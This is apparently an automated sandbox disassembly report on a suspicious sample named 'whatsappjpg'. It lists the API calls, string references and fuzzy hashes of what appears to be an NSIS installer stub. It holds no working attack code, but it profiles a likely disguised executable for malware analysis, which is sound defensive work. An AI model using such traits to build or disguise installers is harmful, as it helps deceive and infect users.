                                                      • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
                                                      • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                      • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,76F92EE0,00405790,?,00436800,76F92EE0), ref: 00406236
                                                      • FindClose.KERNEL32(00000000), ref: 00406242
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID: WB
                                                      • API String ID: 2295610775-2854515933
                                                      • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                      • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                                                      • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                      • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 00405330
                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                                                      • GetClientRect.USER32(?,?), ref: 0040537C
                                                      • GetSystemMetrics.USER32(00000015), ref: 00405384
                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405420
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405441
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                                                        • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405493
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                                                      • CloseHandle.KERNEL32(00000000), ref: 004054A8
                                                      • ShowWindow.USER32(00000000), ref: 004054CC
                                                      • ShowWindow.USER32(?,00000008), ref: 004054D1
                                                      • ShowWindow.USER32(00000008), ref: 0040551B
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                                                      • CreatePopupMenu.USER32 ref: 00405560
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                                                      • GetWindowRect.USER32(?,?), ref: 00405594
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                                                      • OpenClipboard.USER32(00000000), ref: 004055F5
                                                      • EmptyClipboard.USER32 ref: 004055FB
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405611
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                                                      • CloseClipboard.USER32 ref: 00405656
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID: {
                                                      • API String ID: 590372296-366298937
                                                      • Opcode ID: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
                                                      • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                                                      • Opcode Fuzzy Hash: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
                                                      • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                                                      • ShowWindow.USER32(?), ref: 00403CAE
                                                      • DestroyWindow.USER32 ref: 00403CC2
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                                                      • GetDlgItem.USER32(?,?), ref: 00403CFF
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                                                      • GetDlgItem.USER32(?,?), ref: 00403DC8
                                                      • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E3D
                                                      • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                                                      • ShowWindow.USER32(00000000,?), ref: 00403F04
                                                      • EnableWindow.USER32(?,?), ref: 00403F16
                                                      • EnableWindow.USER32(?,?), ref: 00403F31
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F47
                                                      • EnableMenuItem.USER32(00000000), ref: 00403F4E
                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F66
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                                                      • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                                                      • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                                                      • ShowWindow.USER32(?,0000000A), ref: 004040EA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                      • String ID:
                                                      • API String ID: 184305955-0
                                                      • Opcode ID: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
                                                      • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                                                      • Opcode Fuzzy Hash: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
                                                      • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E
                                                      APIs
                                                        • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                        • Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                        • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                      • lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,76F93420,00000000,00434000), ref: 00403933
                                                      • lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B3
                                                      • lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                                                      • GetFileAttributesW.KERNEL32(00427180), ref: 004039D1
                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 00403A1A
                                                        • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                      • RegisterClassW.USER32(00428180), ref: 00403A57
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                                                      • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AEB
                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                                                      • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                                                      • RegisterClassW.USER32(00428180), ref: 00403B1C
                                                      • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                      • API String ID: 914957316-1115850852
                                                      • Opcode ID: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
                                                      • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
                                                      • Opcode Fuzzy Hash: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
                                                      • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404368
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404399
                                                      • GetSysColor.USER32(?), ref: 004043AA
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                                                      • lstrlenW.KERNEL32(?), ref: 004043CB
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404446
                                                      • SendMessageW.USER32(00000000), ref: 0040444D
                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404478
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                                                      • SetCursor.USER32(00000000), ref: 004044CC
                                                      • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,?), ref: 004044E1
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                                                      • SetCursor.USER32(00000000), ref: 004044F0
                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 0040451F
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                      • String ID: AB@$N$open
                                                      • API String ID: 3615053054-4108209771
                                                      • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                      • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                                                      • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                      • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                                                      APIs
                                                      • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C16
                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C3A
                                                      • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                                                        • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                        • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                      • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                                                      • wsprintfA.USER32 ref: 00405C7E
                                                      • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                                                      • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                                                      • CloseHandle.KERNEL32(00000000), ref: 00405D76
                                                        • Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                        • Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                      • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                      • API String ID: 1265525490-3322868524
                                                      • Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                      • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                                                      • Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                      • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                      • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                      • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                      • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404617
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404641
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                                                      • lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 0040472F
                                                      • lstrcatW.KERNEL32(?,00427180), ref: 0040473B
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                                                        • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                                                        • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 004061DF
                                                        • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                        • Part of subcall function 0040617C: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 004061F3
                                                        • Part of subcall function 0040617C: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 00406206
                                                      • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                                                      • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                      • String ID: A
                                                      • API String ID: 2246997448-3554254475
                                                      • Opcode ID: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
                                                      • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                                                      • Opcode Fuzzy Hash: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
                                                      • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00402DCE
                                                      • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA
                                                        • Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                        • Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A
                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E33
                                                      • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7A
                                                      Strings
                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
                                                      • Error launching installer, xrefs: 00402E0A
                                                      • Null, xrefs: 00402EB3
                                                      • soft, xrefs: 00402EAA
                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
                                                      • Inst, xrefs: 00402EA1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                      • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 2803837635-787788815
                                                      • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                      • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                                                      • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                      • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C
                                                      APIs
                                                      • GetVersion.KERNEL32(00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00405FCD
                                                      • GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604B
                                                      • GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 0040605E
                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                                                      • SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060A8
                                                      • CoTaskMemFree.OLE32(?), ref: 004060B3
                                                      • lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                                                      • lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00406131
                                                      Strings
                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1
                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 900638850-730719616
                                                      • Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                      • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                                                      • Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                      • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                                                      • GetSysColor.USER32(00000000), ref: 004041CD
                                                      • SetTextColor.GDI32(?,00000000), ref: 004041D9
                                                      • SetBkMode.GDI32(?,?), ref: 004041E5
                                                      • GetSysColor.USER32(?), ref: 004041F8
                                                      • SetBkColor.GDI32(?,?), ref: 00404208
                                                      • DeleteObject.GDI32(?), ref: 00404222
                                                      • CreateBrushIndirect.GDI32(?), ref: 0040422C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
